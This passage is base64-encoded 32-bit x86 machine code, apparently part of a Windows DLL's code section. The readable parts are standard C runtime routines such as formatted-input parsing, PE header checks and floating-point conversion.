hbT7//+DwFFmiYXG+///x4Xc+///AgAAAOmC/v//qQAQAAAPhYj+//+DwwSoIHQXiZ3o+///qEB0Bg+/Q/zrBA+3Q/yZ6xKoQItD/HQDmesCM9KJnej7///2hfj7//9AdBs7138XfAQ7x3MR99iD0gD32oGN+Pv//wABAAD3hfj7//8AkAAAi9qL+HUCM9uDvfT7//8AfQzHhfT7//8BAAAA6xqDpfj7///3uAACAAA5hfT7//9+BomF9Pv//4vHC8N1BiGF3Pv//421+/3//4uF9Pv///+N9Pv//4XAfwaLxwvDdC2LheT7//+ZUlBTV+gd6P//g8Ewg/k5iZ2k+///i/iL2n4GA420+///iA5O672Nhfv9//8rxkb3hfj7//8AAgAAiYXs+///ibXw+///dF6FwHQHi8aAODB0U/+N8Pv//4uF8Pv///+F7Pv//8YAMOs8hdt1C6EUwAIQiYXw+///i4Xw+///x4XU+///AQAAAOsJT2aDOAB0BkBAhf918yuF8Pv//9H4iYXs+///g72s+///AA+FcwEAAIuF+Pv//6hAdCupAAEAAHQEai3rDqgBdARqK+sGqAJ0FGogWWaJjcT7///Hhdz7//8BAAAAi7XQ+///K7Xs+///K7Xc+///ibWk+///qAx1F/+12Pv//42F4Pv//1ZqIOgg9v//g8QM/7Xc+///i53Y+///jYXE+///UI2F4Pv//+gr9v//9oX4+///CFlZdBv2hfj7//8EdRJTVmowjYXg+///6Nz1//+DxAyDvdT7//8AdXyLhez7//+FwH5yi43w+///iY3k+///iYXM+///oQyTARD/MP+NzPv///+15Pv//42FqPv//1D/FRCTARCL2IPEDIXbfi6Lhdj7//+Ltaj7//+NveD7///oLvX//wGd5Pv//4O9zPv//wCLtaT7//9/q+sig43g+////+sZ/7Xs+///jYXg+////7Xw+///6Gn1//9ZWYO94Pv//wB8IPaF+Pv//wR0F/+12Pv//42F4Pv//1ZqIOgV9f//g8QMg724+///AHQU/7W4+////xUwkwEQg6W4+///AFmLnej7//+LtbD7//8z/w+3BomF5Pv//2Y7x3QHi8jpCvb//zm9wPv//3QNg73A+///Bw+FpvX//4uF4Pv//4tN/F9eM81b6Bfb///Jw4v/QUcBEDxF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xAw7wQ+FBwEAAIuFMP3///+NMP3//4XAD4TzAAAA/7Uo/f///4U0/f//6I8jAACLjRz9//8Pt8CJhTz9//9mi4Xw/P//ZokEWY2FBP3//1CNhUD9//9QQ1ONvRz9//+NtQD9///o//X//4PEEIXAD4QKCQAA94U8/f//AP8AAA+FjAAAAA+2hTz9//9Q/xU8kwEQWYXAdHmLhTD9////jTD9//+FwHRpi4Uc/f//ZouNPP3///+FIP3//2aJDFiNhQT9//9QjYVA/f//UENTjb0c/f//jbUA/f//6In1//+DxAyFwA+ElAgAAP+1KP3///+FNP3//+jCIgAAD7fAWYmFPP3//6kA/wAAD4R0////g70g/f//AA+ElQEAAGplWGY7hTz9//90EGpFWGY7hTz9//8PhXkBAACLhTD9////jTD9//+FwA+EZQEAAIuNHP3//2plWGaJBFmNhQT9//9QjYVA/f//UENTjb0c/f//jbUA/f//6O30//+DxAyFwA+E+AcAAP+1KP3///+FNP3//+gmIgAAWQ+3wGotWYmFPP3//2Y7yHUuUYuNHP3//1hmiQRZjYUE/f//UI2FQP3//1BDU+ie9P//g8QMhcAPhKkHAADrDGorWGY7hTz9//91M4uFMP3///+NMP3//4XAdQghhTD9///rG/+1KP3///+FNP3//+ixIQAAD7fAWYmFPP3///eFPP3//wD/AAAPhYwAAAAPtoU8/f//UP8VPJMBEFmFwHR5i4Uw/f///40w/f//hcB0aYuFHP3//2aLjTz9////hSD9//9miQxYjYUE/f//UI2FQP3//1BDU429HP3//421AP3//+jn8///g8QMhcAPhPIGAAD/tSj9////hTT9///oICEAAA+3wFmJhTz9//+pAP8AAA+EdP////+1KP3///+NNP3///+1PP3//+hu9P//g70g/f//AFlZD4SmBgAAgL0n/f//AA+F7gUAAIu9AP3//4u1HP3///+FCP3//zPAjXw/AldmiQRe/xVEkwEQi9hZhdsPhGsGAABXVlP/FeiSARD/tfD8//8PvoUu/f//U/+1+Pz//0hQ6IoeAABT/xUwkwEQg8Qg6Y0FAACDvRT9//8AahBYD4WCAQAA/4Uw/f//6XcBAACLxoPocA+ECQIAAIPoAw+EVwEAAEhID4T/AQAAg+gDD4Qy+///g+gDdDVmi4U8/f//i5UY/f//ZjkCD4W2BQAA/o0m/f//hMkPhSQFAACLheT8//+Jhez8///pEwUAAGpA6QcBAABqK1hmO4U8/f//dTX/jTD9//91EoO9FP3//wB0CcaFO/3//wHrG/+1KP3///+FNP3//+i/HwAAD7fAWYmFPP3//2owWGY7hTz9//8PhboBAAD/tSj9////hTT9///olB8AAFkPt8BqeFmJhTz9//9mO8h0UGpYWWY7yHRIib0g/f//g/54dBuDvRT9//8AdA7/jTD9//91Bv6FO/3//2pv613/tSj9////jTT9//9Q6Lzy//9Zx4U8/f//MAAAAOlGAQAA/7Uo/f///4U0/f//6CEfAACDvRT9//8AD7fAWYmFPP3//3QVg60w/f//Ajm9MP3//30G/oU7/f//anhe6QYBAABqIIO9FP3//wBYdAILx4C9L/3//wB+A4PIAoTJdAODyASD/nt1QI2NCP3//1H/tej8//+Njfj8////tSj9////tTD9//9RjY00/f//UY2NPP3//1GNjRj9//9RUOg69P//g8Qk6zb/tej8//+NjTz9////tTD9//+NlQj9//9Ri40o/f//agBQjZ34/P//jb00/f//6B3y//+DxBSFwA+FDgQAAOleAwAAxoUu/f//AWotWGY7hTz9//91CcaFJf3//wHrDGorWGY7hTz9//91Nf+NMP3//3USg70U/f//AHQJxoU7/f//Aesb/7Uo/f///4U0/f//6PUdAAAPt8CJhTz9//9Zg738/P//AA+EiwEAAIC9O/3//wAPhU0BAAC7AP8AAIP+eA+EgQAAAIP+cHR8hZ08/f//D4UVAQAAD7aFPP3//1D/FTyTARBZhcAPhP4AAACD/m91MWo4WGY7hTz9//8PhukAAACLhQz9//+LjRD9//8PpMEDweADiYUM/f//iY0Q/f//63pqAGoK/7UQ/f///7UM/f//6KUbAACJhQz9//+JlRD9///rV4WdPP3//w+FmQAAAA+2hTz9//9Q/xUEkwEQWYXAD4SCAAAAi4UM/f//i40Q/f///7U8/f//D6TBBMHgBImFDP3//4mNEP3//+g48P//D7fAWYmFPP3//w+3hTz9////hSD9//+D6DCZAYUM/f//EZUQ/f//g70U/f//AHQI/40w/f//dDn/tSj9////hTT9///orBwAAA+3wFmJhTz9///p0f7///+1KP3///+NNP3///+1PP3//+gA8P//WVmAvSX9//8AD4QtAQAAi4UM/f//i40Q/f//99iD0QD32YmFDP3//4mNEP3//+kJAQAAgL07/f//AIud9Pz//w+F5QAAAL8A/wAAg/54dEeD/nB0QoW9PP3//w+FsQAAAA+2hTz9//9Q/xU8kwEQWYXAD4SaAAAAg/5vdRVqOFhmO4U8/f//D4aFAAAAweMD6zhr2wrrM4W9PP3//3VzD7aFPP3//1D/FQSTARBZhcB0YP+1PP3//8HjBOgJ7///D7fAWYmFPP3//w+3hTz9////hSD9//+DvRT9//8AjVwD0Imd9Pz//3QI/40w/f//dDn/tSj9////hTT9///ogxsAAA+3wFmJhTz9///pOf////+1KP3///+NNP3///+1PP3//+jX7v//WVmAvSX9//8AdAj324md9Pz//4P+RnUHg6Ug/f//AIO9IP3//wAPhPIAAACAvSf9//8AdT7/hQj9//+Lnfj8//+LhfT8//+Dvfz8//8AdBOLhQz9//+JA4uFEP3//4lDBOsQgL0u/f//AHQEiQPrA2aJA4OFGP3//wL+hSb9//+LtRj9//8z/+sl/7Uo/f///4U0/f//6MIaAABZZosOD7fARkaJhTz9//9mO8h1Ybj//wAAZjuFPP3//3UNZoM+JXVbZoN+Am51VA+3BmY7xw+FPPL//+tG/7Uo/f///7U8/f//6zHGAwD/FRSTARDHAAwAAADrJ/+1KP3///+1PP3//+jP7f//ib3g/P//6wz/tSj9//9Q6Lvt//9ZWYO9BP3//wFbdQ3/tRz9////FTCTARBZuP//AABmO4U8/f//dRSLhQj9//+FwHUsOIUm/f//dSTrIoO94Pz//wF1E/8VFJMBEIu9CP3//zP26V3x//+LhQj9//9fi038M81e6JvG///Jw4v/VYvsi0UIg+wgVjP2O8Z1Hv8VFJMBEFZWVlZWxwAWAAAA6F/G//+DxBSDyP/rNTl1EHTdi00Mgfn///8/d9L/dRSJRej/dRCJReCNBAmJReSNReBQx0XsSQAAAOhZ8P//g8QMXsnDzMzMU1G7GMACEOsLU1G7GMACEItMJAyJSwiJQwSJawxVUVBYWV1ZW8IEAP/Qw8zMzMzMi/9Vi+yLTQi4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